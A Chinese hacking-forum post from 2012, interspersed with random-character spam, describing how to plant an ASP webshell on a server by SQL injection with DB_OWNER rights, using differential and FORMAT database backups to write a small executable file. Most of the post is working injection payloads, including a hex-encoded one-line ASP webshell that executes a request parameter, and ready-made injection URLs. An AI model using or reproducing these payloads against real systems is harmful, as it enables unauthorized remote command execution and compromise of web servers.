找回密码
 立即注册
查看: 3056|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:- d" @( f/ G2 o
9 }5 A# C; \; i5 K& u
减少备份文件大小,得到可执行的webshell成功率提高不少: M& }/ `6 o+ G: `
一利用差异备份0 w( g0 D' H  K. _& Q/ T6 k
加一个参数WITH DIFFERENTIAL
$ L8 y: D% a0 f' T7 f' C- ^1 Z6 _$ @: o; e3 f
1
, E& ~' S  z$ n- [- \( Q2% z# F; R8 v/ [6 d5 ^, T& W
3; z9 I1 Z, w/ O6 @- U' M
4
9 W  X# U! m4 F6 J! C9 E* S declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
) `6 \4 {; f* z+ b% h" ^create table [dbo].[xiaolu] ([cmd] [image]);% e5 v! @6 B; N8 P0 h8 `( v
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
8 z" W' Q7 g- Q; fdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL - b! L9 ~/ y& c9 M
5 @1 N1 S4 l2 N+ @- x) w2 V1 L
二利用完全FORMAT( j% J  l- z" s, u, i% d
加一个参数WITH FROMAT/ d1 E0 r: g: a# o
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
3 h  M+ g; N/ X# U
. ?) d! y( h& y9 z) P13 E' K" Y% l( |& f  Q9 H) t# ]
2, \' K; v' C+ V6 L  L5 |' u
3. g$ W3 c1 V" L4 L/ G& J
4
3 V- A% r+ ^' Q# W declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s; j. S3 r" Y. B9 s+ c( k
create table [dbo].[xiaolu] ([cmd] [image]);9 u7 ^( X3 Y% `4 Y, y" v; ~
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)7 t" Y+ ]1 T+ T0 G+ y
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
$ o5 p4 q: D0 I  T) Y4 N
5 g% d  L  q' b& Q总的来说就是那么简单几句,下面以备份数据库model为例子
+ m& L/ |+ q4 Z0 j1
4 z( ?1 ]  W) Q5 r$ n. E6 H/ Y1 `4 c
11 \* ]" m1 F3 a0 b; [( P. l
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
7 B% t$ K. ]4 P, e3 |3 Y  F9 K% u6 h& w( w% v
2' V, ?. U" A$ m& ]6 A1 u" w
! }4 Z% C1 Q2 L" g% \; \1 L1 P
1
, B, S5 n# M' Y+ j id=1;backup database model to disk='你的路径‘ with differential,format;--
0 H. F" G# D% n- i- `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表